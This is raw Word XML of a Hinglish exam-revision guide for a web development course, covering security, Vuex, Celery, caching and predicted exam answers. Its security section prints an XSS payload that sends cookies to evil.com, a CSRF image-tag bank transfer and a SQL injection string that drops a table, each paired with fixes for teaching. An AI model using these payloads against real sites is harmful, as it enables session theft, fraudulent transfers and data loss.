          <w:bottom w:color="d6e4f0" w:space="0" w:sz="4" w:val="single"/>
        </w:pBdr>
        <w:shd w:fill="1f4e79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SECTION F — WEEK 12: Security, Privacy &amp;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F1. Privacy vs Security — Difference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930"/>
        <w:gridCol w:w="3930"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1500"/>
            <w:gridCol w:w="3930"/>
            <w:gridCol w:w="3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Apne personal data pe control ka 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Data ko technically protect karna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Enforced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Regulations (GDPR, HIPAA)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Implementation (code, infrastructure)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Kaunsa data collect/share ho sakta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Collected data kaisa safe rakha jaaye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GDPR consent, data deletion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Encryption, authentication, firewalls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F2. Important Regulations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000"/>
        <w:gridCol w:w="2300"/>
        <w:gridCol w:w="3260"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="800"/>
            <w:gridCol w:w="3000"/>
            <w:gridCol w:w="2300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General Data Protection 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EU + EU users ka data koi bhi handle kare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User consent, right to delete, breach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HIPAA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Health Insurance Portability &amp; Accountability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US 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Patient health info protect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CCPA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California Consumer Privacy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California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Right to know/delete/opt-out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7b00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WARNING — EXAM TRAP!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GDPR TRAP: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3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App developers CANNOT claim ignorance of regulations!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Violations pe fines: €20M tak ya 4% of global revenue (jo bhi zyada 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3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EU users ka data handle karna matlab GDPR apply hogi — chahe company EU mein ho ya na ho!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F3. XSS — Cross-Site Scripting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XSS tab hota hai jab attacker malicious script inject karta hai kisi page mein, jo dusre users ke browsers mein execute ho jaata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ATTACK EXAMPLE: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3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Comment field mein yeh input daala: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&lt;script&gt;fetch('evil.com?c='+document.cookie)&lt;/script&gt;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3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Agar server sanitize nahi karta toh yeh store ho jaata hai DB mein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Jab koi bhi user page dekhe → script run ho jaati hai → cookies chori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VULNERABLE Flask code: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@app.route('/help')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4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def help():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q = request.args.get('q', '')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return f'&lt;h1&gt;Results for: {q}&lt;/h1&gt;'  # DANGEROUS! q inject ho sakta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SAFE Flask code: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4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from markupsafe import escape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@app.route('/help')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def help():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4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q = escape(request.args.get('q', ''))  # escape karo!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4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return f'&lt;h1&gt;Results for: {q}&lt;/h1&gt;'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4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XSS Prevention Techniques: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4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5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1. Escape all user input before rendering (markupsafe.escape in Flask)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5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2. Vue {{ }} automatically escape karta hai — v-html NEVER use karo user input ke saath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5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3. Content Security Policy (CSP) header set karo — external scripts block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5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4. HttpOnly cookies rakho — JS se cookies access na ho saken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5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5. Server-side input validation karo hamesha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F4. CSRF — Cross-Site Request Forgery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CSRF tab hota hai jab attacker ki website kisi logged-in user ke browser ko ek unintended request karne pe majboor karti hai target site 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5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ATTACK SCENARIO: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5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User bank mein logged in hai (cookie active)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Attacker ki malicious site pe yeh image hai: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5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&lt;img src='https://bank.com/transfer?amount=10000&amp;to=attacker'&gt;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5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User ki malicious page visit karte hi browser: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1. Image load karne ki koshish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2. Bank.com ko GET request bhejta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3. Bank ka session cookie automatically include hota hai!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6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4. Bank transfer execute kar deta hai!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6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6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DEFENSE 1: CSRF Token (hidden field in forms)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&lt;form&gt;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&lt;input type='hidden' name='csrf_token' value='random_secret_token'&gt;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6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&lt;/form&gt;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6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Server verify karta hai ki token valid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6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6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DEFENSE 2: SameSite Cookie Attribute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6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Set-Cookie: session=xxx; SameSite=Strict; HttpOnly; Secure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F5. SQL Injection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6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VULNERABLE CODE — KABHI MAT KARO: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name = request.form['name']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query = f"SELECT * FROM users WHERE name = '{name}'"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Agar name = '; DROP TABLE users; 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→ Query: SELECT * FROM users WHERE name = ''; DROP TABLE users; --'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→ DATABASE DELETE HO JAATA HAI!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SAFE CODE — Parameterized queries use karo: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cursor.execute('SELECT * FROM users WHERE name = %s', (name,))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 Ya ORM use karo (SQLAlchemy):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User.query.filter_by(name=name).first()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7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Q (PYQ): What security issue exists in Flask route code using f-string in SQL query?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7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7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Teen issues simultaneously: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7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1. No authentication check — koi bhi endpoint access kar sakta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7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2. SQL Injection — f-string directly query mein use kiya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8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3. Unvalidated user input — user_id validate nahi kiya before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8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8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FIX: @auth_required + parameterized queries + input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F6. Cookies — Security Flags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800"/>
        <w:gridCol w:w="4060"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1500"/>
            <w:gridCol w:w="38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Cookie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Kya karta hai?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Kaisi attack se bachata hai?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HttpOnly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Cookie JavaScript se access nahi ho sakti (document.cookie)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XSS — cookie theft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Cookie sirf HTTPS pe send hoti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Man-in-the-middle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SameSite=Strict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Cookie cross-site requests ke saath nahi jaati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CSRF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Session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Browser close hone pe delete ho jaati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Persistent session theft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Persistent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Expiry date tak store rehti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N/A — 'Remember me'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9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HiSS Formula — Teen Security Flags Yaad Karo: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9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H = HttpOnly (no JS access)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9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 = Secure (HTTPS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 = SameSite (CSRF prevention)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9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9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Ideal cookie: Set-Cookie: session=xxx; HttpOnly; Secure; SameSite=Strict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F7. Flask-Security-Too Decorators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from flask_security import auth_required, login_required, roles_required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@app.route('/profile')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@login_required               # Unauthenticated users ko login page pe redirect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def profile():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return 'User Profile'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@app.route('/api/data')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@auth_required('token', 'session')  # Token ya session dono accept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def api_data():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return jsonify({'data': '...'})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@app.route('/admin')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@roles_required('admin')      # Sirf 'admin' role wale access kar sakte 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def admin_panel():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  return 'Admin Panel'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F8. HTTPS aur Password Security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HTTP + TLS/SSL. Sab traffic encrypt hoti hai. Always HTTP → HTTPS redirect karo.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Password hashing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NEVER plain text. Bcrypt/Argon2 use karo (salt automatic). MD5/SHA1 ALONE never.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CSP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default-src 'self' → sirf same origin scripts allow. External scripts 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Supply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Version pinning + reduce dependencies → supply chain attacks se protection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B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Q (PYQ): CSP header with default-src 'self'. External script load karne ki koshish karo. Kya hoga?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C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C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External script FAIL ho jaayega load hone mein.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C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Browser console mein error log hoga.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C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C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Reason: default-src 'self' = sirf same origin se resources allow.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C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otherurl.com ka script → different origin → BLOCKED by browser.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C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C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Yeh XSS attacks se protect karta hai — malicious external scripts block ho jaate hain.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1"/>
        <w:pBdr>
          <w:bottom w:color="d6e4f0" w:space="0" w:sz="4" w:val="single"/>
        </w:pBdr>
        <w:shd w:fill="1f4e79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SECTION G — All PYQ Theory Questions — Model Answers (Aug 2025 + Dec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Theory Question Bank — Exam-Ready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Yeh saare theory questions dono papers se extracted hain. Har answer mein exam mein likhne wali exact language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Q1. What does 'reactivity' mean in Vue.js?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D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Reactivity ka matlab hai DOM automatically update hona jab underlying reactive data change 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D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Vue data dependencies track karta hai aur sirf affected components re-render karta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D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Yeh RELOAD nahi karta — sirf affected parts update hote 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One-liner: Reactivity = automatic DOM re-render when data changes.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Q2. Message queue mein consumer slower ho producer se — kya hoga?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D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Messages queue mein accumulate (pile up) hone lagenge.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D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Queue buffer ki tarah kaam karta hai — messages tab tak store karta hai jab tak consumer process kar sake.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D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Messages DROP nahi hote (unless queue full ho aur overflow policy na ho).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D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One-liner: Slow consumer → queue mein messages accumulate hote hain.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Q3. CORS ka primary purpose kya hai?</w:t>
      </w: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E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E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CORS (Cross-Origin Resource Sharing) control karta hai ki kaunsi domains different origin se resources access kar sakti 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E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Yeh ek browser security mechanism hai jo HTTP headers ke through enforce hoti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CORS data encrypt NAHI karta — sirf access control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E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One-liner: CORS = controls cross-origin resource access via HTTP headers.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Q4. @cache.cached() ka main benefit kya hai Flask mein?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E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E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Route function ka execution SKIP karta hai repeated identical requests ke liye.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E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Response store karta hai aur subsequent identical requests pe directly return karta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E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Server load reduce karta hai aur response time fast hota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E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One-liner: @cache.cached() = skip re-execution for repeated requests.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Q5. Supply chain attacks se protect kaise karein?</w:t>
      </w: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F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F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Version pinning — dependency versions lock karo unexpected updates prevent karne ke liye.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F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Dependencies reduce karo — kam third-party packages = chota attack surface.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F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GitHub stars security guarantee NAHI dete.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F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Env variables secrets ke liye helpful hain, supply chain ke liye nahi specifically.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Q6. Web page load speed directly kya affect karta hai?</w:t>
      </w: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F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F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HTTP requests ki number (zyada requests = slow load)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F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Resources ka file size (images, JS files)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F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CSS selectors ki number aur semantic HTML → DIRECTLY load speed affect NAHI karte.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Q7. Webhooks ke baare mein sahi statements kaunse hain?</w:t>
      </w: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4F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Enable real-time data delivery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HTTP POST requests use karte hain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0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Server-to-server communication ke liye design kiye hain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0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Client se polling require karte hain — FALSE (webhooks polling eliminate karte hain)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Q8. Flask caching ka main advantage kya hai?</w:t>
      </w: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0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0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Server load reduce karta hai stored responses reuse karke repeated requests ke liye.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0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Expensive recomputation ya repeated DB queries avoid karta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0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Data encrypt NAHI karta. DB completely eliminate NAHI karta.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Q9. Lighthouse Performance score kaunse factors impact karte hain?</w:t>
      </w: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0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0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FCP (First Contentful Paint) — pehla content kab dikhta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1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TTI (Time to Interactive) — page kab fully interactive banta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1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CLS (Cumulative Layout Shift) — visual stability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1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HTTPS Performance score NAHI, Best Practices score affect karta hai!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Q10. Flask + Celery background tasks ke baare mein TRUE kaunsa hai?</w:t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1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1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Celery long-running tasks ko asynchronously execute karne deta hai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1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Polling task status periodically check karne ki strategy hai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1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Flask + Celery + Redis production stack common hai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1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time.sleep() async tasks mein use karo — FALSE (event loop BLOCK karta hai)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Q11. Vuex mutations aur actions ke baare mein TRUE kaunsa hai?</w:t>
      </w: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1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1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Actions asynchronous ho sakte hain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2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Sirf actions APIs call karein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2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Mutations directly aur synchronously state modify karte hain —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2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Mutations asynchronous ho sakte hain — FALSE (CANNOT be async)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Q12. JavaScript closures ke baare mein TRUE kaunsa hai?</w:t>
      </w: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2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 — Teen hi statements hain, teeno TRUE hain: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2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1. Closure outer function ke variables access kar sakta hai chahe outer function return ho jaaye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2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2. Closure tab banta hai jab function kisi doosre function ke andar define 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2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3. Closures data encapsulation enable karte hain (private data pattern)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Q13. Long polling ke baare mein TRUE kaunsa hai?</w:t>
      </w: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2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2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Client ek request bhejta hai; server connection HOLD karta hai jab tak naya data available na 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2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Jab data available ho, server respond karta hai aur connection close hoti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3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Client turant ek aur request bhejta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3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Regular polling (fixed intervals) se alag hai — long poll wait karta hai.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Q14. @cache.memoize() aur @cache.cached() ka difference?</w:t>
      </w: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3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3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@cache.memoize() = function results ARGUMENTS ke basis pe cache karta hai (per unique input)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3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@cache.cached() = ENTIRE VIEW/ROUTE response cache karta hai (arguments ignore karta hai)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3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3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Use memoize() for: functions with different params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3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Use cached() for: views/routes without params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Q15. async/await ke baare mein FALSE statement kaunsi hai?</w:t>
      </w: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3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 (FALSE statement):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3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'async functions run synchronously but await executes asynchronously' — YEH FALSE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4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4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Sahi: async functions themselves asynchronously run karte hain; await function ke andar execution pause karta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4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4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TRUE statements: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4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await sirf async function ke andar use ho sakta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4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async functions hamesha Promise return karte hain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Q16. Browser storage ke baare mein FALSE statement?</w:t>
      </w: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4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 (FALSE statement):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4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'sessionStorage data browser close hone ke baad bhi persist karta hai' — YEH FALSE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4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4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sessionStorage session-only hai — browser close hone pe data chala jaata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4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4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TRUE statements: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4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Cache-Control: no-store caching prevent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5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localStorage cookies se zyada size have karta hai (~5MB vs ~4KB)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Q17. beforeDestroy aur destroyed lifecycle hooks?</w:t>
      </w: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5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5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beforeDestroy: Component DOM se remove hone se PEHLE call hota hai → cleanup yahan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5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destroyed: Component fully destroy hone ke BAAD call hota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5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beforeDestroy mein event listeners remove karo, timers clear karo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Q18. CSP header default-src 'self' — external script fail hoga?</w:t>
      </w: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5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5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External script load hona FAIL ho jaayega.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5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Browser console mein error log hoga.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5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default-src 'self' = sirf same origin se resources allow.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5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otherurl.com = different origin = BLOCKED.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Q19. Flask route code mein security issues?</w:t>
      </w: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6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 — Teen issues simultaneously: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6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1. No authentication check — koi bhi endpoint access kar sakta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6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2. SQL Injection — f-string directly query mein use kiya gaya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6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3. Unvalidated user input — user_id validate nahi kiya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5e5e"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Q20. Vuex mutation mein async operation ka issue?</w:t>
      </w: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6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6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Vuex mutations MUST be synchronous.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6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Async operations (fetchAdminData().then()) mutations mein Vuex devtools tracking break karte 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6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Time-travel debugging fail ho jaata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6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FIX: Async logic ko ACTION mein move karo → action mutation commit kare.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pBdr>
          <w:bottom w:color="d6e4f0" w:space="0" w:sz="4" w:val="single"/>
        </w:pBdr>
        <w:shd w:fill="1f4e79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SECTION H — Predicted Exam Questions + Model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H1. High Probability MCQs (Based on PYQ Frequency)</w:t>
      </w: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7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Predicted Q1: Which Vuex component is responsible for synchronously modifying state?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7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7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Options: (a) Actions (b) Getters (c) Mutations (d)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7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(c) Mutations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7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Reason: Mutations ONLY way hain state change karne ka. Must be SYNCHRONOUS.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7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Predicted Q2: Which HTTP method is cacheable?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7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7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Options: (a) POST (b) PUT (c) GET (d)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7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(c) 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7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Reason: GET idempotent hai — state nahi badalta. Responses safely cache ho sakte hain.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8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Predicted Q3: In Celery, which method dispatches a task asynchronously?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8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8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Options: (a) .run() (b) .execute() (c) .apply() (d) .delay()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8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(d) .delay()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8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Reason: .delay() task queue mein bhejta hai bina calling code ko block kiye.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8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Predicted Q4: A webhook is best described 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8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8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Options: (a) Persistent bidirectional connection (b) HTTP callback triggered by event (c) Polling mechanism (d) Database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8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(b) HTTP callback triggered by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8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Reason: Provider event hone pe tumhare registered URL pe POST karta hai.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9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Predicted Q5: Which cookie flag prevents cookie from being accessed via JavaScript?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9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9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Options: (a) Secure (b) SameSite (c) HttpOnly (d) NoScript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9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(c) HttpOnly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9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Reason: HttpOnly flag se document.cookie se cookie access nahi ho sakti → XSS protection.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9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Predicted Q6: SSE (Server-Sent Events) communication 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9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9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Options: (a) Client to Server only (b) Bidirectional (c) Server to Client only (d) Peer to peer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9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(c) Server to Client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9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Reason: SSE unidirectional push hai — server se browser ko. Bidirectional nahi.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9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Predicted Q7: @cache.memoize() vs @cache.cached() main difference?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9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A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Options: (a) Same hai dono (b) memoize args-based cache karta hai; cached URL-based (c) cached faster hai (d) memoize sirf GET karta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A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(b)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A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memoize = per-argument cache; cached = entire view/route cache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A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Predicted Q8: Celery ke liye kaunse teen components chahiye?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A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A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ANSWER: BAW — Broker (Redis/RabbitMQ) + App (@celery.task) + Worker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A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Teeno simultaneously chalne chahiye. Ek bhi missing → Celery nahi chalega.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H2. Short Answer Questions (Theory)</w:t>
      </w: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A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Short Q1: Webhook vs Polling mein kya fark hai?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A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A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A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Webhook: Server-initiated PUSH. Ek server doosre server ke URL pe POST karta hai jab event hota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B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Polling: Client-initiated PULL. Client periodically server se poochta hai 'kuch naya hai?'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B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B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Webhook advantages: Efficient (no wasted requests when nothing changed), real-time, event-driven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B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Polling disadvantages: Bandwidth waste, server overload with many clients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B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B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Example: Stripe payment complete pe webhook call karta hai instantly.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B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        Status manually check karte rahe toh polling hai.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B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Short Q2: XSS kaise hota hai aur kaise prevent karein?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B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B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B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XSS (Cross-Site Scripting): Attacker malicious JS code kisi page mein inject karta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B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Dusre users ke browsers mein execute hota hai — cookies, session steal ho sakti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B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B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Types: Stored XSS (DB mein store), Reflected XSS (URL parameter), DOM XSS (client-side JS)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C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C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Prevention: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C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1. Escape all user input before rendering (markupsafe.escape)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C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2. Vue {{ }} automatically escape karta hai — v-html user input se never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C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3. Content Security Policy (CSP)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C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4. HttpOnly cookies — JS se access nahi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C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Short Q3: GET cacheable kyun hai aur POST nahi?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C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C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MODEL ANSWER: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C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GET idempotent hai — sirf data read karta hai, server state nahi badalta.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C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Same URL → same response (server changes ke bina). Safely cache kar sakte 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C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C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POST create/modify karta hai — har call side effects create karta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C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Cache kiya toh order create nahi hoga (dangerous!)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D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D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Practical example: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D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GET /products/5 → cache kar sakte ho, same product har baar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D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POST /orders → naya order create karta hai har baar — NEVER cache karo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H3. Long Answer Questions</w:t>
      </w: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D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Long Q1: Vuex architecture explain karo — State, Getters, Mutations, Actions with examples.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D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D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KEY POINTS TO COVER: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D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D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1. Problem: Prop drilling — multiple components same data share karna mushkil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D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2. Solution: Centralized store — single source of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D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D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3. Unidirectional data flow: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D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   Component → dispatch action → action commits mutation → mutation updates state → Vue re-renders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E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E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4. State: Global reactive data (this.$store.state.count)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E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5. Getters: Computed from state (this.$store.getters.totalPrice) — cached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E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6. Mutations: SYNC ONLY direct state change (store.commit('increment'))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E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7. Actions: Async allowed, API calls, commits mutations (store.dispatch('fetchData'))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E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E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8. Why mutations sync? Time-travel debugging ke liye devtools mutations record karta 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E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   Async mutations = unpredictable order = debugging impossible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E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E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9. NEVER mutate state directly from component!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4a235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📝 EXAM / PYQ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E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Long Q2: REST vs GraphQL compare karo. Kab use karein?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E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E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KEY POINTS TO COVER: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E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F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REST problems: Over-fetching, under-fetching, multiple requests, rigid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F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F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GraphQL solutions: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F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- Single endpoint → client exact fields maangta hai → no over/under-fetch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F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- Multiple resources ek query mein → fewer round trips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F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- Strongly typed schema → errors early detect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F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- Mutations for write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F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F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REST use karo: Simple CRUD APIs, strong caching needed, public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F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GraphQL use karo: Complex data requirements, web+mobile with different needs,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F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                 multiple data sources aggregate karna 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F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235a" w:space="0" w:sz="4" w:val="single"/>
              <w:left w:color="4a235a" w:space="0" w:sz="4" w:val="single"/>
              <w:bottom w:color="4a235a" w:space="0" w:sz="4" w:val="single"/>
              <w:right w:color="4a235a" w:space="0" w:sz="4" w:val="single"/>
            </w:tcBorders>
            <w:shd w:fill="e8daef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5F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Caching: REST GET cacheable; GraphQL mostly POST → not cacheable by default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1"/>
        <w:pBdr>
          <w:bottom w:color="d6e4f0" w:space="0" w:sz="4" w:val="single"/>
        </w:pBdr>
        <w:shd w:fill="1f4e79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SECTION I — Last-Minute Cheat Sheet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Vuex Quick Rules</w:t>
      </w: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1500"/>
        <w:gridCol w:w="3360"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2000"/>
            <w:gridCol w:w="2500"/>
            <w:gridCol w:w="15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Call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Async?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 change?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store.commit('name')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✅ YES directly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store.dispatch('name')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 — commits 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this.$store.getters.name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 — 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this.$store.state.name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✅ Via mutation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HTTP Methods Quick Reference</w:t>
      </w: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1500"/>
        <w:gridCol w:w="4660"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1200"/>
            <w:gridCol w:w="2000"/>
            <w:gridCol w:w="1500"/>
            <w:gridCol w:w="4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Cacheable?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Read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GET /students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Create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POST /students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Full replace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PUT /students/5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Partial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PATCH /students/5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DELETE /students/5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Browser Storage</w:t>
      </w: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00"/>
        <w:gridCol w:w="2500"/>
        <w:gridCol w:w="2560"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1800"/>
            <w:gridCol w:w="2500"/>
            <w:gridCol w:w="25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Survives Browser Restart?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Same origin, all tabs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~5MB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sessionStorage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 (tab close pe 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Same tab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~5MB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Cookies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Depends on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Configurable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~4KB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Security Quick Reference</w:t>
      </w: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500"/>
        <w:gridCol w:w="4360"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1500"/>
            <w:gridCol w:w="35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it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XSS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Malicious script inject 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Escape output + CSP header + HttpOnly cookies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CSRF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Attacker site makes request using victim's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CSRF tokens + SameSite cookie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SQL code in user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Parameterized queries ALWAYS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Lighthouse Metrics — Yaad Karo</w:t>
      </w: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000"/>
        <w:gridCol w:w="5360"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1000"/>
            <w:gridCol w:w="3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One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First Contentful Paint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Pehla content kab dikhta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Largest Contentful Paint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Main content kab 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Speed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Content visually kitni jaldi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Time to Interactive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Page fully interactive kab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Total Blocking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JS blocking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Cumulative Layout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Content kitna shift hota hai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Webhook vs Polling vs SSE vs WebSocket</w:t>
      </w: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800"/>
        <w:gridCol w:w="1500"/>
        <w:gridCol w:w="4560"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1500"/>
            <w:gridCol w:w="1800"/>
            <w:gridCol w:w="15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Persistent?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Server →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Event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Short Poll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Client →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Periodic status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Long Poll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Client →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⏳ Semi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Delayed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Server →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Live feeds,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Bidirectional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Real-time chat/gaming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NEVER / ALWAYS Rules</w:t>
      </w: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7b00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WARNING — EXAM TRAP!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8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NEVER karo yeh galtiyan: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8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Arrow functions in Vue data/methods/computed/watch at top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8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Vuex state directly modify karo component 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8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store.commit() for actions (commit = mutation only!)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8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Async code mutations mein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8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f-strings SQL queries mein (SQL injection!)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8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Plain text passwords store karo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8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sessionStorage → survives tab close sochna (nahi karta!)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8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localStorage.removeElement() — DOES NOT EXIST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adbd8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8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❌ v-html user input ke saath (XSS!)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1e56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✅ TIP / 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8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ALWAYS karo yeh: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9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Regular functions use karo Vue options mein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9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Parameterized queries use karo SQL mein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9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Bcrypt/Argon2 use karo passwords ke liye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9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HttpOnly + Secure + SameSite cookies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9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store.dispatch() for actions, store.commit() for mutations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9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Celery = Broker + App + Worker — teeno chalao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5631" w:space="0" w:sz="4" w:val="single"/>
              <w:left w:color="1e5631" w:space="0" w:sz="4" w:val="single"/>
              <w:bottom w:color="1e5631" w:space="0" w:sz="4" w:val="single"/>
              <w:right w:color="1e5631" w:space="0" w:sz="4" w:val="single"/>
            </w:tcBorders>
            <w:shd w:fill="d5f5e3" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="40.0" w:type="dxa"/>
              <w:left w:w="1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69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✅ GET requests cache karo (idempotent); POST kabhi nahi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2"/>
        <w:pBdr>
          <w:bottom w:color="1f4e79" w:space="2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Memory Tricks — Last Night Revision</w:t>
      </w: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Mnemonic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Vuex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C-MAD: Component → dispatch → Action → commit → Mutation → update →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HTTP verbs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GPCPD: Get=Read, Post=Create, Put=Replace, Patch=Update, Delete=Remove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Celery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BAW: Broker + App + Worker (teeno chahiye)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XSS vs CSRF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XSS = X-tra Script inject. CSRF = Cross-Site Request Faking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Cookie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HiSS: HttpOnly, Secure, SameSite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Lighthouse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FiLST CL: FCP, LCP, SI, TTI, TBT, CLS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JAMStack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J=JavaScript (client), A=APIs (backend), M=Markup (pre-built HTML)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SIM: Service worker + Icon/manifest + Make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cached vs memoize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Cached = URL-only. Memoize = with Arguments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D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Tu kar sakta hai, Sahil! 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Sab topics cover kiye, sab PYQs dekhe, sab traps yaad kiye. Ab jao aur exam dou! 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5e5e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